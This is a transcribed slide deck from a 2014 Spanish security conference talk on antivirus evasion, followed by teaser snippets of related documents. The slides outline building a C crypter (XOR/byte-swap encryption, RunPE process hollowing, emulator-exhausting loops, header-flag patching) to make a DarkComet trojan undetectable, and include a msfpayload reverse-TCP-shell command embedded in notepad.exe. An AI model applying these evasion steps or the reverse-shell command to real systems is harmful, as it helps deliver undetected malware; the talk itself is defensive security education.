Desmitificando el Antivirus
|
|
- Inés Marín Calderón
- hace 8 años
- Vistas:
Transcripción
1 La defensa del patrimonio tecnológico frente a los ciberataques 10 y 11 de diciembre de 2014 Desmitificando el Antivirus 2014 Centro Criptológico Nacional C/Argentona 20, MADRID
2 VIII JORNADAS STIC CCN-CERT Abraham Pasamar Navarro INCIDE 2
3 VIII JORNADAS STIC CCN-CERT Índice 1.- Efectividad de los Antivirus 2.- Evasión de Antivirus 3.- Crypters 4.- C Crypter 5.- Demo 3
4 VIII JORNADAS STIC CCN-CERT Antivirus 4
5 VIII JORNADAS STIC CCN-CERT Antivirus Nos protegen? Sí Hasta qué punto? Todo lo que pueden respecto de las infecciones comunes y lo que pueden prever 5
6 VIII JORNADAS STIC CCN-CERT Ataque dirigido (APT) Cybercriminales Nos protegen? No mucho Las técnicas de Detección de los AVs actualmente son insuficientes Las defensas convencionales son insuficientes 6
7 VIII JORNADAS STIC CCN-CERT Press Brian Dye, CEO de Symantec mayo 2014 Paradigma ha cambiado > protección AV host/perimetro es insuficiente 7
8 VIII JORNADAS STIC CCN-CERT AV s: Cómo funcionan? Escanean binarios en el DISCO Escanean en MEMORIA? algunos y poco :( Buscan AV BBDD Buscan TÉCNICAS MALICIOSAS (heurística) EMULADOR (ejecución parcial) Tiempo Real 8
9 VIII JORNADAS STIC CCN-CERT Por qué evadir AV s? BAD GUYS: MALWARE = $$$$$$$ Botnets, Ransomware APT GOOD GUYS: Auditoría, Pentesting 9
10 Cómo evadir AV s? VIII JORNADAS STIC CCN-CERT Encoders MALWARE suele ser una pieza compleja. Crypter es mucho más simple. Packers Permite proteger malware detectado. REUTILIZACIÓN Crypters msfpayload windows/shell/revers e_tcp LHOST= LPORT= 4444 R msfencode -c 5 -e x86/ shikata_ga_nai -x notepad.exe > notepad2.exe TIP: Método Público = MAL Método Privado = BIEN 10
11 Información sobre Crypters? Papers VIII JORNADAS STIC CCN-CERT Abusing File Processing in Malware Detectors for Fun and Profit (2012) Suman Jana and Vitaly Shmatikov The University of Texas at Austin Bypassing Anti-Virus Scanners (2012) InterNOT Security Team Hyperion: Implementation of a PE-Crypter (2012) Christian Ammann One packer to rule them all: Empirical identification, comparison and circumvention of current Antivirus detection techniques (BruCON 2014) Arne Swinnen,Alaeddine Mesbahi 11
12 VIII JORNADAS STIC CCN-CERT Foros Underground Manuales Video-Tutoriales Binarios Código Herramientas Multi AV-Scanners Enlaces:
13 VIII JORNADAS STIC CCN-CERT Qué es un Crypter? Software creado para ocultar código malicioso y hacerlo indetectable a los antivirus (FUD) CRYPTER (Builder) STUB MALWARE DETECTADO CRYPTER + STUB XOR, RC4... exe dll recurso STUB MALWARE CIFRADO 13
14 VIII JORNADAS STIC CCN-CERT Builder/Stub 14
15 PROCESO 2 PROCESO 1 VIII JORNADAS STIC CCN-CERT RunPE o Dynamic Forking CreateProcess (CREATE_SUSPENDED) EP I EP 2 ReadFile GetThreadContext WriteProcessMemory ResumeThread SetThreadContext BaseAddress PEB EBX EAX 15
16 Let s code a C Crypter VIII JORNADAS STIC CCN-CERT Builder MALWARE STUB C O N T E N E D O R MALWARE CIFRADO 16
17 Let s code a C Crypter VIII JORNADAS STIC CCN-CERT Builder RUTINA DE CIFRADO 17
18 Let s code a C Crypter VIII JORNADAS STIC CCN-CERT Builder STUB+FIRMA+MALWARE CIFRADO 18
19 VIII JORNADAS STIC CCN-CERT Let s code a C Crypter Stub Localizar la FIRMA SEPARADORA Descifrado (decryptbuffer=xor[buffer]) 19
20 VIII JORNADAS STIC CCN-CERT Let s code a C Crypter Stub Arrancar el proceso en memoria (Dynamic Forking) Estructuras CreateProcess WriteProcessMemory cabecera (CREATE_SUSPEND) ResumeThread ejecutable 20
21 VIII JORNADAS STIC CCN-CERT Let s code a C Crypter TROJAN SERVER (Darkcomet). SIN CRYPTER Multi AV SCAN TROJAN SERVER CRYPTED (stub+[crypted Darkcomet]) 21
22 Improving the Crypter VIII JORNADAS STIC CCN-CERT :( 13 Signatures Qué podemos hacer? API HOOKS :) GetProcAddress 22
23 Let s Scan the Crypter V1 - Original Crypter Multi AV SCAN VIII JORNADAS STIC CCN-CERT V2 - API Hooks 23
24 Improving the Crypter VIII JORNADAS STIC CCN-CERT Añadiendo soporte para parámetros main > WinMain (ncmdline) 24
25 Improving the Crypter Cambiando la rutina de cifrado XOR > byte SWAP VIII JORNADAS STIC CCN-CERT 25
26 Let s scan the Crypter V2 - API Hooks Multi AV SCAN VIII JORNADAS STIC CCN-CERT V3 - Parameters & byte Swap Ooohhh!!! 26
27 Improving the Crypter VIII JORNADAS STIC CCN-CERT FIRMAS indican HEURISTICA Matemos las firmas heurísticas!!! Exhausting routine Emulador > Time Out big loop ANTIVIRUS EMULATOR REAL TIME DETECTION No es posible procesarlo en tiempo real junk code 27
28 Let s Scan the Crypter V3 - Parameters & byte Swap Multi AV SCAN VIII JORNADAS STIC CCN-CERT V4 - Exhausting Routine OH YEAH!!! 28
29 Improving the Crypter FIRMAS Estáticas VIII JORNADAS STIC CCN-CERT AVAST Método de cifrado Variante: SWAP +/- 1 29
30 Improving the Crypter FIRMAS Estáticas VIII JORNADAS STIC CCN-CERT AVIRA Firmas Cabecera (CRC/clusterización) - FLAGS Sección CAMBIAMOS FLAGs VALOR NO ESPERADO 30
31 Let s scan the Crypter V4 - Exhausting Routine Multi AV SCAN VIII JORNADAS STIC CCN-CERT V6 - Cifrado+ & patch Flags Awesome!!! 31
32 VIII JORNADAS STIC CCN-CERT DEMO Crypter en C (FUD) Probarlo en un ataque Ingeniería social (1 click) Word + Macro (downloader) Sandworm (0 clicks) Ejecución FUD-Trojan en TR 32
33 Conclusiones Bypass AVs es POSIBLE -> Compromiso INFORMACIÓN VIII JORNADAS STIC CCN-CERT Necesario prestar atención al COMPORTAMIENTO Algunos elementos a considerar: Perímetro (callbacks C&C) SANDBOX Contexto 33
34 VIII JORNADAS STIC CCN-CERT IMÁGENES Banco Imáges Propio Flickr, user: eviltomthai Chiswick Chap - Own work 34
35 VIII JORNADAS STIC CCN-CERT GRACIAS POR SU INCIDE Avda. Diagonal, 640 6ª Planta Barcelona 1NC1D3 Companies > INCIDE - Investigación Digital Tel./Fax /
36 s Websites Síguenos en Linked in
Medidas fundamentales para mitigar el ciberespionaje. La segmentación
La defensa del patrimonio tecnológico frente a los ciberataques 10 y 11 de diciembre de 2014 Medidas fundamentales para mitigar el ciberespionaje. La segmentación 2014 Centro Criptológico Nacional C/Argentona
Más detallesHomeland. La defensa del patrimonio tecnológico frente a los ciberataques. 10 y 11 de diciembre de 2014. www.ccn-cert.cni.es
La defensa del patrimonio tecnológico frente a los ciberataques 10 y 11 de diciembre de 2014 Homeland 2014 Centro Criptológico Nacional C/Argentona 20, 28023 MADRID www.ccn-cert.cni.es El enemigo puede
Más detallesi S La defensa del patrimonio tecnológico frente a los ciberataques 10 y 11 de diciembre de 2014 www.ccn-cert.cni.es
La defensa del patrimonio tecnológico frente a los ciberataques 10 y 11 de diciembre de 2014 i S 2014 Centro Criptológico Nacional C/Argentona 20, 28023 MADRID www.ccn-cert.cni.es Raúl Siles DinoSec Fundador
Más detallesTaller Plataforma Avanzada Malware
La defensa del patrimonio tecnológico frente a los ciberataques 10 y 11 de diciembre de 2014 Taller Plataforma Avanzada Malware (MISP-MARTA-MARIA) 2014 Centro Criptológico Nacional C/Argentona 20, 28023
Más detallesTorrentLocker se enmascara tras Cryptolocker y juega al despiste en la suplantación de Correos.
TorrentLocker se enmascara tras Cryptolocker y juega al despiste en la suplantación de Correos. El pasado día 2 de diciembre de 2014 se detectó una campaña masiva de correos electrónicos cuyo objetivo
Más detallesUNIVERSIDAD NACIONAL DE INGENIERÍA
UNIVERSIDAD NACIONAL DE INGENIERÍA CENTRO DE EXTENSIÓN Y PROYECCIÓN SOCIAL AREA DE CURSOS DE ESPECIALIZACIÓN EN TECNOLOGÍAS DE LA INFORMACIÓN ESPECIALIZACIÓN EN ANALISIS, DESARROLLO E IMPLEMENTACIÓN DE
Más detallesLa heurística en los virus
La heurística en los virus Francisco Eleazar Delgado Contreras Jesús Humberto Rojas Rangel José Luis Mares Monsiváis Coautor: Julio César González Cervantes FCFM-UANL Facultad de Ciencias Físico Matemáticas
Más detallesGhost in the Shell. La defensa del patrimonio tecnológico frente a los ciberataques. 10 y 11 de diciembre de 2014. www.ccn-cert.cni.
La defensa del patrimonio tecnológico frente a los ciberataques 10 y 11 de diciembre de 2014 Ghost in the Shell 2014 Centro Criptológico Nacional C/Argentona 20, 28023 MADRID www.ccn-cert.cni.es Jaime
Más detallesPre-fetching of suspicious mobile apps based on Big Data techniques and correlation
La defensa del patrimonio tecnológico frente a los ciberataques 10 y 11 de diciembre de 2014 Pre-fetching of suspicious mobile apps based on Big Data techniques and correlation 2014 Centro Criptológico
Más detallesKaspersky Anti-Virus 2012 Kaspersky Internet Security 2012
Kaspersky Anti-Virus 2012 Kaspersky Internet Security 2012 PAGE 2 Protección ante Nuevas Amenazas Escenario de las amenazas y respuestas Escenario de las amenazas: crecimiento del malware > 200,000,000
Más detalles[Titulo] : Creacion de un Crypter [Lenguaje] : Delphi [Autor] : Doddy Hackman. [Temario]
[Titulo] : Creacion de un Crypter [Lenguaje] : Delphi [Autor] : Doddy Hackman [Temario] -- =================-------- 0x01 : Introduccion 0x02 : Creacion del Builder 0x03 : Creacion del Stub 0x04 : Probando
Más detallesWORKSHOP PATAGONIA 2009
WORKSHOP PATAGONIA 2009 by Cvila Malware (código_malicioso) está definido tradicionalmente como cualquier archivo que causa daño a una computadora, servidor o red. Actualmente debemos agregar a la lista:
Más detallesAtaques de relay en tarjetas EMV NFC con dispositivos Android
La defensa del patrimonio tecnológico frente a los ciberataques 10 y 11 de diciembre de 2014 Ataques de relay en tarjetas EMV NFC con dispositivos Android 2014 Centro Criptológico Nacional C/Argentona
Más detallesLa defensa del patrimonio tecnológico frente a los ciberataques
La defensa del patrimonio tecnológico frente a los ciberataques 10 y 11 de diciembre de 2014 2014 Centro Criptológico Nacional C/Argentona 20, 28023 MADRID www.ccn-cert.cni.es Joaquín Seco Martínez joaquin.seco@csa.es
Más detalleslfgonzalez@iq-online.comonline.com
El orden de los bits sí altera el producto: Talón de Aquiles de los Antivirus VIII Jornada Nacional de Seguridad Informática Bogotá Colombia Colombia Luis Fernando González V. CEH iq Outsourcing S.A lfgonzalez@iq-online.comonline.com
Más detallesSeguridad Informática ANTIVIRUS. Antivirus
Seguridad Informática ANTIVIRUS Antivirus Que es un Antivirus??? Un antivirus es un programa informático específicamente diseñado para detectar bloquear y eliminar virus, utilizan diferentes técnicas para
Más detallesDIA 22, Tendencias tecnológicas en detección de malware Phook & BuggyBoss
DIA 22, Tendencias tecnológicas en detección de malware Phook & BuggyBoss David Reguera García Técnico de operaciones en INTECO-CERT 22 Noviembre 2007 1º ENCUENTRO NACIONAL DE LA INDUSTRIA DE SEGURIDAD
Más detallesG Data Informe técnico. Behaviour Blocking. (Escudo de comportamiento) Go safe. Go safer. G Data. Marco Lauerwald Marketing
G Data Informe técnico Behaviour Blocking (Escudo de comportamiento) Marco Lauerwald Marketing Go safe. Go safer. G Data. Indice 1 Behaviour Blocking Objetivo: Combatir amenazas desconocidas... 2 1.1 Parásitos
Más detallesESPOCH - FACULTAD CIENCIAS BOLETÍN TÉCNICO INFORMÁTICO 02 22 de diciembre del 2008
VIRUS.... 1 INSTALACIÓN DE ANTIVIRUS... 2 ACTUALIZACIÓN SIN INTERNET.... 5 VIRUS. Al comportamiento extraño de nuestras PC, acostumbramos a decir que estamos infectados; y desde luego que algún tipo de
Más detallesLección 6: Malware. Bernardo Quintero bernardo@hispasec.com Hispasec VirusTotal Founder
Lección 6: Malware Bernardo Quintero bernardo@hispasec.com Hispasec VirusTotal Founder Malware: definición y tipos Malicious software Se denomina malware al software malicioso, diseñado para llevar cabo
Más detallesNOD32 Antivirus 5. Desde Georgia, con amor
Desde Georgia, con amor Está alguien ESET intentando espiar a Georgia? Nuevos Smart Security 5 y ESET NOD32 Antivirus 5 Fernando de la Cuadra, director de Educación (fernando@ontinet.com) Josep Albors,
Más detallesSeguridad y Privacidad en el Cloud. Deepak Daswani Daswani Responsable de Investigación en Ciberseguridad de INTECO
Seguridad y Privacidad en el Cloud Deepak Daswani Daswani Responsable de Investigación en Ciberseguridad de INTECO Madrid, 11 de Junio de 2014 Sociedad digital Vivimos en un entorno digital big data blogs
Más detallesTRABAJO DE INTRODUCCION A LA INFORMATICA INTEGRANTE GLEIDIS ARRIETA SUAREZ GIANNY MENDEZ JIMENEZ DUVAN MORA CRISTO TUTOR ALEXANDER BENAVIDES
TRABAJO DE INTRODUCCION A LA INFORMATICA INTEGRANTE GLEIDIS ARRIETA SUAREZ GIANNY MENDEZ JIMENEZ DUVAN MORA CRISTO TUTOR ALEXANDER BENAVIDES UNIVERSIDAD DE CARTAGENA CREAD MAGANGUÉ FACULTAD DE CIENCIAS
Más detallesSon herramientas diseñadas para detectar, bloquear y eliminar virus informáticos y otros programas maliciosos.
ANTIVIRUS: Qué es? Son herramientas diseñadas para detectar, bloquear y eliminar virus informáticos y otros programas maliciosos. Existen dos tipos de antivirus: de escritorio y en línea. Los antivirus
Más detallesLIMPIEZA DE MALWARE: javier.esparza@seguridadticmelilla.es seguridadticmelilla.es
LIMPIEZA DE MALWARE: El malware es algo malo. Su computadora está en constante riesgo de infección por malware, incluyendo virus, gusanos, troyanos, rootkits, marcadores y spyware. Malwarebytes se especializa
Más detalles2013-07-02. CiberNoticias. SCProgress. www.scprogress.com
2013-07-02 CiberNoticias SCProgress www.scprogress.com ÍNDICE 1. Avira explica cómo detectar el malware y qué consejos de seguridad hay que seguir con los navegadores.........03 2. Falla de seguridad en
Más detallesTema 17. Algunos aspectos de seguridad informática
Tema 17. Algunos aspectos de seguridad informática Virus y otro malware Cortafuegos Criptografía Recomendaciones de seguridad generales Virus y otro malware Malware Virus Troyanos Keyloggers Programas
Más detallesBOLETÍN DE ALERTA. Figura 1: Ejemplo de comentario con enlace a una noticia falsa
BOLETÍN DE ALERTA Boletín Nro. : 2016-02 Fecha de publicación : 08/01/2016 Tema : Distribución de malware para Android a través de comentarios falsos Descripción : Hace un tiempo se ha observado un importante
Más detallesFuckWall. A Windows Firewalls Bypassing Tool
FuckWall A Windows Firewalls Bypassing Tool Quiénes no sómos? Investigadores buscando fallos en el protocolo DNS 2 Quiénes no sómos? Hackers que vieron la luz al final del tunel y encontraron vida más
Más detallesNueva Variante Ransomware
Nueva Variante Ransomware CTB-Locker conocido también como Critroni.A, Onion-Locker es una nueva variante del tipo Ramsomware detectada en el inicio del año 2015, similar a las versiones pasadas esta amenaza
Más detallesPROTECCIÓN ANTE LA INCERTIDUMBRE TECNOLOGÍA PROACTIVA B-HAVE DE BITDEFENDER PARA LUCHAR FRENTE A MÚLTIPLES AMENAZAS
PROTECCIÓN ANTE LA INCERTIDUMBRE TECNOLOGÍA PROACTIVA B-HAVE DE BITDEFENDER PARA LUCHAR FRENTE A MÚLTIPLES AMENAZAS El panorama actual de las amenazas en la red Tanto el panorama de la seguridad como la
Más detallesLos mecanismos de seguridad convencionales ya no son suficientes
Los mecanismos de seguridad convencionales ya no son suficientes Acerca de mi Yered Céspedes Ingeniero en sistemas CISSP, CISA, CEH, CISM, ITIL Security+ Pentester Finalista de Global Cyberlympics 5 años
Más detallesConfiguración ESET anti-ransomware. Más seguridad contra el secuestro de información
Configuración ESET anti-ransomware Más seguridad contra el secuestro de información ÍNDICE Objetivos de este documento técnico............ 3 Por qué usar esta configuración adicional?.......... 3 Configuración
Más detallesGusanos que dañan el Sistema Operativo
Gusanos que dañan el Sistema Operativo Autor: Sebastián Bortnik, Analista de Seguridad de ESET para Latinoamérica Fecha: 27 de julio del 2009 ESET, LLC 610 West Ash Street, Suite 1900 phone: (619) 876
Más detallesQué es un antivirus? Son programas cuya función es detectar y eliminar Virus informáticos y otros programas maliciosos (a veces denominados malware).
Antivirus Qué es un antivirus? Son programas cuya función es detectar y eliminar Virus informáticos y otros programas maliciosos (a veces denominados malware). Funcionamiento Básico Compara el código de
Más detalles100% Laboratorios en Vivo
100% Laboratorios en Vivo Sabemos que la única forma de aprender es haciendo. Por lo mismo todos los laboratorios son con desafíos de hacking en un ambiente en vivo. Con servidores y servicios dentro de
Más detallesPROPUESTA DE INFORME TÉCNICO PREVIO DE EVALUACIÓN DE SOFTWARE ADQUISICIÓN DE LJCENCIAS DE SOFTWARE ANTIVIRUS
PROPUESTA DE INFORME TÉCNICO PREVIO DE EVALUACIÓN DE SOFTWARE ADQUISICIÓN DE LJCENCIAS DE SOFTWARE ANTIVIRUS 1. NOMBRE DEL ÁREA: Tecnologías de Información 2. RESPONSABLES DE LA EVALUACIÓN: Julio Becerra
Más detallesCapacitación VMS Políticas de Agente. Seguridad Integral, Detección, Limpieza y Reparación Total
Capacitación VMS Políticas de Agente Seguridad Integral, Detección, Limpieza y Reparación Total 1 RIS VRSP Pantalla Principal General Menu de inicio: Visualizamos las opciones de escaneo y configuración
Más detalles[Un framework de test de intrusión web]
[Un framework de test de intrusión web] IV OWASP Spain Chapter Meeting 21 Noviembre 2008, Barcelona, España José Ramón Palanco. Hazent Systems S.L jose.palanco@hazent.com. Qué es w3af? Quién debería conocer
Más detallesSeguridad [Virus] M. en C. Sergio Luis Pérez Pérez. UAM CUAJIMALPA, MÉXICO, D. F. Trimestre 13-P. Sergio Luis Pérez (UAM CUAJIMALPA) Seguridad 1 / 30
Seguridad [Virus] M. en C. Sergio Luis Pérez Pérez UAM CUAJIMALPA, MÉXICO, D. F. Trimestre 13-P Sergio Luis Pérez (UAM CUAJIMALPA) Seguridad 1 / 30 Posibles ataques a un sistema Posibles ataques a un sistema
Más detalles3. Menciona 5 antivirus incluyendo sus versiones con su descripción breve.
1. Define el concepto de seguridad informática y de la web Es el área de la informática que se enfoca en la protección de la infraestructura computacional y todo lo relacionado con esta y, especialmente,
Más detallesDEFENSI By ITECH S.A.S. CGEM Centro de Gestión Efectiva de Malware Laboratorio Antimalware
VENOM, UN FALLO DE SEGURIDAD MÁS PELIGROSO QUE HEARTBLEED QUE COMPROMETE MILLONES DE SERVIDORES Fuente: http://www.redeszone.net/ Artículo complementado de acuerdo a investigaciones realizadas por Itech
Más detallesBabel Enterprise 2.0. Gestión de la seguridad para entornos corporativos. Area de Sistemas y Seguridad
Babel Enterprise 2.0 Gestión de la seguridad para entornos corporativos Area de Sistemas y Seguridad Qué es Abartia Team? Consultoría tecnológica de Software Libre Especializada en Sistemas y Seguridad,
Más detallesS eguridad Informática
1- D efinición de Virus 2 - R eproducción de los Virus 3 - Tipos de Virus 4 - Los daños que causan 5 - Formas de contagio 6 Otros Malware 6 Antivirus y Firewall 7 - Medidas de Prevención 1- D efinición
Más detallesRealizado por: Daniel Sánchez Álvarez
Realizado por: Daniel Sánchez Álvarez QUE SON? Es una red de equipos infectados por códigos maliciosos que son controlados por un atacante, disponiendo de sus recursos para que trabajen de forma conjunta
Más detallesPANDA USB VACCINE QUÉ ES? PRO CESO DE INSTALACIÓN. Abrir archivo le daremos a Ejecutar.
PANDA USB VACCINE Abrir archivo le daremos a Ejecutar. QUÉ ES? Panda Security pone a disposición de los usuarios una herramienta para evitar la forma de infección más común en los dispositivos extraíbles
Más detallesCONFIGURACION CLIENTE WEB Internet Explorer 7.0, 8.0, 9.0, 10.0, 11.0
CONFIGURACION CLIENTE WEB Internet Explorer 7.0, 8.0, 9.0, 10.0, 11.0 a) La versión del explorador debe ser Microsoft Internet Explorer 7.0 o superior. b) Para configurar las opciones ingresar al Internet
Más detallesQué son y cómo combatirlas
Redes zombies Qué son y cómo combatirlas Calle San Rafael, 14 28108 Alcobendas (Madrid) 902 90 10 20 www..com Introducción Hoy en día podemos encontrar un elevado número de amenazas en la red, pero unas
Más detallesInstalar MBSA y GFI Languard en Windows Server 2008 y hacer un análisis.
Actividad 4. Instalar MBSA y GFI Languard en Windows Server 2008 y hacer un análisis. MBSA: instalamos Microsoft Baseline Security Analyzer (es gratis), y pulsamos en la opción Scan a computer. GFI Languard:
Más detallesESET NOD32 Antivirus 4.2 ESET NOD32 Antivirus 4.2 (Business Edition)
ESET NOD32 Antivirus 4.2 ESET NOD32 Antivirus 4.2 (Business Edition) Boletín de Producto 11 de Marzo de 2010 Versión 2.6 ESET NOD32 Antivirus 4 Todos los usuarios necesitan contar con una protección completa
Más detallesReputació n Web. Actualmente la forma por la que se infectan los equipos puede ocurrir, como norma general, de tres formas distintas:
Aprobado en Consejo Informático 19-3-2013 - OFFICESCAN Reputació n Web Contexto y situación actual Actualmente la forma por la que se infectan los equipos puede ocurrir, como norma general, de tres formas
Más detallesPresentada por: Enrique Lannes Gerente de Ventas America Latina
Presentada por: Enrique Lannes Gerente de Ventas America Latina 3 4 CIBERWAR en su propia red. 1800 ataques exitosos por semana en grandes organizaciones 3 67% de la infraestructura actual no puede detener
Más detallesESET NOD32 y otros antivirus
ESET, LLC 610 West Ash Street, Suite 1900, San Diego, CA 92101, USA phone: +1 (619) 876 5400, fax: +1 (619) 437 7045 sales@eset.com, www.eset.com ESET NOD32 y otros antivirus Fecha: Lunes 12 de Abril de
Más detallesANTIVIRUS ANTIVIRUS ESET EESET NOD32 N NOD32 Por qué cambiar cambiar a E SET EESET ESET NOD32? NOD32? <info@planatec.es>
ANTIVIRUS ESET NOD32 Por qué cambiar a ESET NOD32? POR QUÉ NOD32? La eficacia de ESET NOD32 combinada con su increíble velocidad de análisis (entre 2 y 50 veces más rápido que la competencia)
Más detallesMaría Camila Restrepo Castrillón. Mantener la Operatividad del Sistema
María Camila Restrepo Castrillón Mantener la Operatividad del Sistema RELACION ENTRE KERNEL Y VARIABLES DE ENTORNO Todas las variables tiene valores razonables de forma predeterminada, pueden ser modificadas
Más detallesINSTITUTO TECNOLÓGICO DE SALTILLO
INSTITUTO TECNOLÓGICO DE SALTILLO Departamento de Ciencias Básicas Curso: Diseño de Paginas Web para el Docente. Temario del Curso: 1 Introducción. 1.1 Objetivo del curso. 1.2 Alcances del curso. 1.3 Ejemplo
Más detallesESET NOD32 Antivirus 4 para Linux Desktop. Guía de inicio rápido
ESET NOD32 Antivirus 4 para Linux Desktop Guía de inicio rápido ESET NOD32 Antivirus 4 le proporciona a su equipo protección de última generación contra códigos maliciosos. Basado en el motor de exploración
Más detallesEntorno de Programación Visual Studio 6
Entorno de Programación Visual Studio 6 Pedro Corcuera Dpto. Matemática Aplicada y Ciencias de la Computación Universidad de Cantabria corcuerp@unican.es Programación en C 1 Proceso de Programación Edición
Más detallesManual de instalación de Kaspersky Internet Security
Manual de instalación de Kaspersky Internet Security A continuación se describe paso a paso la descarga e instalación del antivirus KIS (Kaspersky Internet Security). DESCARGAR EL INSTALADOR Abrir el navegador
Más detallesSeguridad Gestionada. Una nueva forma de combatir las amenazas. Ruperto Garcia-Soto Consultor Preventa 1
Seguridad Gestionada Una nueva forma de combatir las amenazas Ruperto Garcia-Soto Consultor Preventa 1 Fundada en 1990 1.500 empleados en el mundo Oficinas en más de 50 países 2º fabricante más importante
Más detallesANEXOS. Algoritmo que genera un valor hash de algún dato, como una clave de. mensaje o de sesión. Con un buen algoritmo de hash, los cambios que se
ANEXOS GLOSARIO A Algoritmo de hash Algoritmo que genera un valor hash de algún dato, como una clave de mensaje o de sesión. Con un buen algoritmo de hash, los cambios que se produzcan en los datos de
Más detallesRequisitos de control de proveedores externos
Requisitos de control de proveedores externos Ciberseguridad Para proveedores clasificados como de bajo riesgo de ciberdelito 1. Protección de activos y configuración de sistemas Los Datos de Barclays,
Más detallesTOPICOS IV: ING. YIM APESTEGUI FLORENTINO
1 2 MIGRACIÓN DE DATOS E INTEGRACIÓN ENTRE SISTEMAS. Actividades propias de la INGENIERÍA DE SISTEMAS E INF. Se requiere conocimientos técnicos y fundamentales. Planificación y Ejecución. 3 PROCESO DE
Más detallesINFORME TECNICO PREVIO DE EVALUACION DE SOFTWARE Nro.002-2013-OTIC-OGETIC-SG/MC SOFTWARE ANTIVIRUS PARA ESTACIONES Y SERVIDORES
INFORME TECNICO PREVIO DE EVALUACION DE SOFTWARE Nro.002-201-OTIC-OGETIC-SG/MC SOFTWARE ANTIVIRUS PARA ESTACIONES Y SERVIDORES 1. NOMBRE DEL ÁREA Oficina de Tecnologías de la Información y Comunicaciones
Más detallesPresentación. Porqué formarte con nosotros?
Presentación Un Hacker Ético es un profesional dotado de habilidades para encontrar las debilidades o vulnerabilidades en los sistemas utilizando el mismo conocimiento y herramientas que un hacker malicioso,
Más detallesGuía Rápida de Inicio
Guía Rápida de Inicio 1. Acerca de esta Guía Esta guía le ayudará a instalar y dar los primeros pasos con BitDefender Security for Exchange. Para disponer de instrucciones detalladas, por favor, diríjase
Más detallesInforme de Amenazas CCN-CERT IA-02/14. Riesgos de uso de Windows XP tras el fin de soporte
Informe de Amenazas Riesgos de uso de Windows XP tras el fin de soporte 22 de enero de 2014 LIMITACIÓN DE RESPONSABILIDAD El presente documento se proporciona de acuerdo con los términos en él recogidos,
Más detallesPROTECCIoN USB: javier.esparza@seguridadticmelilla.es seguridadticmelilla.es
PROTECCIoN USB:, Hoy en día los virus han mutado hacia nuevas formas, y vías de contaminación. Técnicamente son peores, y utilizan lenguajes de programación de más alto nivel, por lo que se necesitan menos
Más detallesPablo Albacete Cristina Elliott Fátima García Alba Molina Grado en Química
Pablo Albacete Cristina Elliott Fátima García Alba Molina Grado en Química Malicious Software Software cuyo objetivo es objetivo infiltrarse o dañar un sistema sin el consentimiento de su propietario Tipo
Más detallesMANUAL PARA MANTENIMIENTO Y OPTIMIZACION DE SU EQUIPO
MANUAL PARA MANTENIMIENTO Y OPTIMIZACION DE SU EQUIPO Debe realizar el mantenimiento de su equipo periódicamente, todos los pasos aquí detallados los llevará a cabo cada 15 días para mantener su equipo
Más detallesPROCEDIMIENTO DE EVALUACIÓN Y ACREDITACIÓN DE LAS COMPETENCIAS PROFESIONALES CUESTIONARIO DE AUTOEVALUACIÓN PARA LAS TRABAJADORAS Y TRABAJADORES
MINISTERIO DE EDUCACIÓN SECRETARÍA DE ESTADO DE EDUCACIÓN Y FORMACIÓN PROFESIONAL DIRECCIÓN GENERAL DE FORMACIÓN PROFESIONAL INSTITUTO NACIONAL DE LAS CUALIFICACIONES PROCEDIMIENTO DE EVALUACIÓN Y ACREDITACIÓN
Más detallesAnálisis Sophos Home
Análisis Sophos Home 07/01/2016 Sophos Home es una herramienta antimalware gratuita que protege equipos de escritorio con sistemas operativos de Microsoft (a partir de Windows 7) y de Apple (a partir de
Más detallesInfraestructura Tecnológica. Sesión 10: Sistemas cortafuego
Infraestructura Tecnológica Sesión 10: Sistemas cortafuego Contextualización Actualmente tendemos a utilizar los sistemas de comunicación en una forma masiva, por lo que no siempre tenemos el cuidado adecuado
Más detallesESET CYBER SECURITY PRO para Mac Guía de inicio rápido. Haga clic aquí para descargar la versión más reciente de este documento.
ESET CYBER SECURITY PRO para Mac Guía de inicio rápido Haga clic aquí para descargar la versión más reciente de este documento. ESET Cyber Security Pro proporciona protección de última generación para
Más detallesAlineando los recursos técnicos con el negocio
IBM Security Systems Alineando los recursos técnicos con el negocio Caracas, 13 de Septiembre de 2012 Vicente Gozalbo Moragrega IBM Security Solutions WW Security Tiger Team, LATAM vgozalbo@co.ibm.com
Más detallesGUIA DE USUARIO ELMO. Conexión VPN-ELMO para PCs y MACs
GUIA DE USUARIO ELMO Conexión VPN-ELMO para PCs y MACs 1.- Introducción... 3 2.- Especificaciones previas y requerimientos SW/HW... 3 2.1.- Plataforma Windows... 3 2.2.- Plataforma Linux... 4 3.- Instalación
Más detallesRedes sociales utilizadas para propagar malware
Redes sociales utilizadas para propagar malware Autor: Cristian Borghello, Technical & Educational Manager de ESET para Latinoamérica Fecha: Lunes 28 de enero del 2008 ESET, LLC 610 West Ash Street, Suite
Más detallesAtaques XSS en Aplicaciones Web
Ataques XSS en Aplicaciones Web Education Project Antonio Rodríguez Romero Consultor de Seguridad Grupo isoluciones antonio.rodriguez@isoluciones.es Copyright 2007 The Foundation Permission is granted
Más detallesLo más habitual es que los virus permanezcan ocultos en archivos del tipo ejecutable (.exe y.com), pero pueden existir en otros formatos.
En informática, pequeño software que, al igual que un virus biológico, infecta a una computadora y se propaga en ella con diversos propósitos como daño, robo de información, molestia, etc. y por lo general
Más detallesSeguridad en dispositivos Android VI Jornada de Seguridad y Protección de Datos de Carácter Personal
dispositivos VI Jornada de Seguridad y Protección de Datos de Carácter Personal Pablo González Nalda Depto. de Lenguajes y Sistemas Informáticos EU de Ingeniería de Vitoria-Gasteiz 12 de noviembre de 2014
Más detallesBest Practices for controlling Advanced Threats and their Persistence. Matthew Ancelin Cybersecurity Analyst
Best Practices for controlling Advanced Threats and their Persistence Matthew Ancelin Cybersecurity Analyst Mejores prácticas para controlar las Amenazas Avanzadas y su Persistencia Matthew Ancelin Cybersecurity
Más detallesAnexo B. Comunicaciones entre mc y PC
Anexo B Comunicaciones entre mc y PC En este apartado se hará hincapié en los comandos para el manejo del módulo de comunicaciones desde el PC. Conociendo estos comando se podrá realizar una aplicación
Más detallesPráctica 5. Curso 2014-2015
Prácticas de Seguridad Informática Práctica 5 Grado Ingeniería Informática Curso 2014-2015 Universidad de Zaragoza Escuela de Ingeniería y Arquitectura Departamento de Informática e Ingeniería de Sistemas
Más detallesRogue: Falsos antivirus gratis
Autor: Cristian Borghello, Technical & Educational Manager de ESET para Latinoamérica Fecha: Lunes 05 de agosto de 2008 ESET, LLC 610 West Ash Street, Suite 1900 phone: (619) 876 5400, fax: (619) 437 7045
Más detallesAvira Version 2012 (Windows)
